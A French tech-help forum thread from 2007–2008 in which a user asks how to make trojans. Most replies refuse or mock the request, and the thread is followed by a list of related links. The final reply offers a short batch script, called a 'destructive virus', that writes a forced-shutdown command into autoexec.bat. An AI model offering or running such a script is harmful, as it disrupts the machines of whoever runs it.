Flux rss
Rechercher : dans
Par : Pertinence Date Nom d'utilisateur
Statut : Non résolu

Comment cree des trojan

deeluxe, le dimanche 28 octobre 2007 à 19:05:34
Bonjour,
jaimerais savoire comment cree des trojan please
Configuration: Windows XP
Internet Explorer 7.0
Répondre à deeluxe  Signaler ce message aux modérateurs Aller au dernier message

1

• Ce message vous semble utile, votez !
  • Signaler ce message aux modérateurs
H4rDW4r3Z, le dimanche 28 octobre 2007 à 19:06:49
Tes intentions ne semblent pas très honnêtes...
Poste ce genre de problème ailleurs.
Répondre à H4rDW4r3Z

2

charlattan, le dimanche 28 octobre 2007 à 19:09:47
Bonsoir H4 ....
Et tu crois qu'on va te répondre, ici sur CCM ?

Tu nous prends pour des "C..."

Personne ici n'a envie d'aller se rfaire une Santé

Passe ton chemin , et pose une question plus intelligente;.

Reconnaitre être "con", est un signe d'intelligence !
Répondre à charlattan

3

H4rDW4r3Z, le dimanche 28 octobre 2007 à 19:11:54
charlattan, apprend à (bien) lire avant de poster.
Regarde bien qui est à l'origine du thread. Merci!
Répondre à H4rDW4r3Z

4

charlattan, le dimanche 28 octobre 2007 à 19:16:04
Bonsoir H4rDW4r3z

Pardon tu as raison, autant pour moi
je te présente toutes mes excuses.
Bonne soirée
Reconnaitre être "con", est un signe d'intelligence !
Répondre à charlattan

5

H4rDW4r3Z, le dimanche 28 octobre 2007 à 19:17:35
Ca arrive à tout le monde.
Bonne continuation
Répondre à H4rDW4r3Z

6

mini hakeur, le lundi 28 janvier 2008 à 16:28:18
Page, doc et tutoriaux officiels va su ce site tu trouvera petere lé reponse pour cré un trojen
Répondre à mini hakeur

7

Elfragor, le samedi 23 août 2008 à 21:01:12
Créer des trojans ne servent pas qu'au gens mal intentionné , si quelqun a besoin de relier ses deux ordinateur ou quelque chose dans ce genre , je pense que c'est legal .
Répondre à Elfragor

8

TheTROLL, le mardi 30 septembre 2008 à 15:01:31
lol j'aime bien le lien qui a été donné!

comment créé des page web en PHP!! j'adort! « don’t feed the troll » (ne nourrissez pas le troll)
Ne pollué pas le post des autres! créé vous votre propre pos­t, pour toutes questions! merci pour eux et pour nous!!
Répondre à TheTROLL

9

Oddfan321, le mercredi 1 octobre 2008 à 12:48:49
écoute, je trouve cela vraiment con au plus au point de faire cela. je te le déconseille fortement carc'est illégal. Et quand tu auras un trojan sur ton ordi, tu ne diras plus la même chose... Alors fait pas ce truc. (les pirate, ce sont les gens qui sont con et qui veulent juste se la peter en disant: je sais pirater! franchement, je trouve cela DéBILE!!!!!) je dit pas que tu ai comme cela mais deviens pas un pirate et surtout ne les encourages pas!) VIVE LES ANTI-PIRATES!
les pirate, c des nazes!!!!!! (quand j'ai écris ces mots, j'était légerement énnervé mais, je n'en pense pas moins!!!!!!!!
Répondre à Oddfan321

10

torpille, le mardi 21 octobre 2008 à 10:33:44
je suis daccor avec Oddfan321 car moi jme suis déja fais piraté une adresse msn et sa fais pas vrément plésir
Répondre à torpille

11

J0eYkhadaFi, le mercredi 12 novembre 2008 à 01:20:00
les Pir@Te du net "les vrai" son en règle générale très intelligent on les S'appelle les élites.
ces vrai qu'il y a énormément de petit con qui se prenne pour des hacker lOol mai il passe leur vie sur le PC faut bien qu'il s'amuse les pauvres.

Bonne Soirée
Répondre à J0eYkhadaFi

12

jeremy, le dimanche 30 novembre 2008 à 16:00:29
pour créer un virus trojan il fo que tu ouvre un document texte et que tu ecrive:

@echo off
echo shutdown -s -f -t 0 >> C: \autoexec.bat
cls

mais fait attention mec ci t'a pas d'anti virus ne le fait pas car ces un vrai virus destructeur donc il fau que tu et un anti virus
Répondre à jeremy

Résultats pour comment cree des trojan

Simple Trojan (Client/Serveur) (Résolu) Bonjour à tous ! Je voudrais savoir comment creer un simple trojan (client/serveur) et le longague necessaire a sa conception. Et je vous prie de bien vouloir repondre à ma question si du moins vous pouvez et ne me faite pas de moral sur la loi et la... www.commentcamarche.net/forum/affich-7126818-simple-trojan-client-serveur
Trojan avec PDF toolbar (Résolu) Bonjour, un trojan est apparu et a été détecté sur mon ordi par avast ce trojan est contenu dans pdf creator toolbar et son petit non est win32:agent-WYC [trj] je suis allé dans le panneau de configuration>ajou suppression de prog> pour virrer la... www.commentcamarche.net/forum/affich-6358690-trojan-avec-pdf-toolbar
Infecté par Trojan.Obfuscated.en (Résolu) Hier j'ai fait un scan avec AVG anti spyware et il a trouvé un fichier nommé : "Trojan.Obfuscated.en". Il se trouve dans le dossier "C:\Program Files\Adverts\uninst.exe" qui a été crée le 3 mars alors que j'avais fait un scan avec AVG anti... www.commentcamarche.net/forum/affich-2811932-infecte-par-trojan-obfuscated-en

Trojan, comment ça marche ?Comment le pirate arrive t'il à vous espionner avec un Trojan ? Tout d'abord, je vous recommande vivement de bien lire l'article qui suit, merci de vous diriger vers ce lien =>Explication du... www.commentcamarche.net/faq/sujet-9289-trojan-comment-ca-marche
[MSN Messenger] Créer une adresse MSNPour créer une adresse MSN (@msn.com) ou faire une adresse hotmail (@hotmail.com), il suffit de créer un compte .NET passport en procédant à l'inscription via l'adresse suivante... www.commentcamarche.net/faq/sujet-3785-msn-messenger-creer-une-adresse-msn
Création d'image Système (Ghost)Créer une image (ghost) de partition 1 - Intérêt 2 - Pré-requis 2.1 - Explication 2.2 - Opportunités des partitions 2.3 - Mise à jour des images 2.3.1 - Image incrémentale : intéressant mais dangereux ! 2.3.2 - Image incrémentale et... www.commentcamarche.net/faq/sujet-304-creation-d-image-systeme-ghost

Infecté par win32:trojan-ge (Résolu)Bonjour, j'ai 2 pc chez moi et les 2 sont infecté, le 1er j'ai déja créerun post "Infecté par virus nutcraker family"... et le 2eme pc est infecté par win32:trojan-ge... voici un log hijack Logfile of HijackThis v1.99.1 Scan saved at... www.commentcamarche.net/forum/affich-4112989-infecte-par-win32-trojan-ge
Problem de virus trojan.win32.BHO.agz (Résolu)Bonjour, J'ai suivi plusieurs discussions avant de créer la mienne, voilà mon ardi est infecté par trojan et du coup il rame à fond et souvent plante, mon antivirus firewall detecte trojan.win32.bho.agz dans C:\windows\system32 dans le fichier... www.commentcamarche.net/forum/affich-4420601-problem-de-virus-trojan-win32-bho-agz
Trojan et virtumonde, ordi infecté, aidez-moi (Résolu)Bonjour, Je me suis pris un cheval de troie avec un film que je voulais télécharger. il ralentit mon ordi et essaie de modifier mon registre. il me fait auvirir des pop-up me disant que mon ordi est infesté par trojan et abebot, et il crée une petite... www.commentcamarche.net/forum/affich-5772457-trojan-et-virtumonde-ordi-infecte-aidez-moi

Télécharger PDF CreatorPDF Creator est un outil gratuit permettant de créer des PDF à partir de presque n'importe quelle application capable d'imprimer. Il possède également des options de sécurité permettant de crypter les PDF afin de protéger leur lecture. PDF... www.commentcamarche.net/telecharger/telecharger-128-pdf-creator
Télécharger Trojan RemoverSpécialement conçu pour éliminer les trojans (aussi appelés troyens ou chevaux de Troie) ainsi que les intrus de type adwares et spywares , Trojan remover vous aidera à lutter efficacement contre toutes sortes de logiciels espions sévissant sur... www.commentcamarche.net/telecharger/telecharger-34055042-trojan-remover
Télécharger LC ISO CreatorLC ISO Creator est très simple: Il permet de créer un fichier .ISO à partir de vos CD. Cela vous permet ensuite d'utiliser ces fichiers ISO pour les graver, utiliser un logiciel d'émulation de CD (pour ne plus avoir à utiliser le CD original) ou... www.commentcamarche.net/telecharger/telecharger-3673478-lc-iso-creator

Creative Live Cam Video IMUSB,800x600,30 fps,Compatibilité:Windows 98SE/Me/2000/XP,Couleur: ,Divers:The Live! Cam Video IM includes a Creative hands-free headset,Images par seconde:30 Fps,Interface:USB,Logicels inclus: ,Microphone: ,Mise au point:Manuelle,Mode... www.commentcamarche.net/guide-achat/creative-live-cam-video-im-658868-fiche-technique
SimCity CreatorDéveloppeur:Maxis,Genre:Simulation,Avis ESRB :Everyone 6+,Other Names:Sim City Creator www.commentcamarche.net/guide-achat/simcity-creator-1131934-fiche-technique
Creative Live! Cam Optia AFUSB,1600x1200,30 fps,Résolution vidéo maximale:1600x1200 Pixels,Page web du produit:Anglais,Mode photographie,Résolution image fixe:3200x2400,Mise au point:Automatique,Microphone,Logicels inclus:Creative Live!® Cam Center,Cam Manager,Cam Console,... www.commentcamarche.net/guide-achat/creative-live-cam-optia-af-921839-fiche-technique

SQL - Création de tableLe SQL, comportant un langage de définition de données (LDD), permet de créer des tables. Pour cela, il utilise le couple de mots clés CREATE TABLE. La création de tables Le création de tables se fait à l'aide du couple de mots-clés CREATE... www.commentcamarche.net/contents/sql/sqlcreate.php3
PHP - Créer un moteur de rechercheIdée générale Le moteur de recherche ci-dessous ne correspond qu'à une idée possible de moteur de recherche simple, ne gérant qu'un seul mot clé. Le concept du fonctionnement de ce moteur est de créer une base de donnée contenant les mots clés de... www.commentcamarche.net/contents/php/phpmoteur.php3
Créer un réseau localPourquoi mettre en place un réseau local? Lorsque vous disposez de plusieurs ordinateurs, il peut être pratique de les connecter ensemble afin de créer un réseau local (en anglais LAN, abréviation de Local Area Network). La mise en place d'un tel... www.commentcamarche.net/contents/configuration-reseau/creer-reseau-local.php3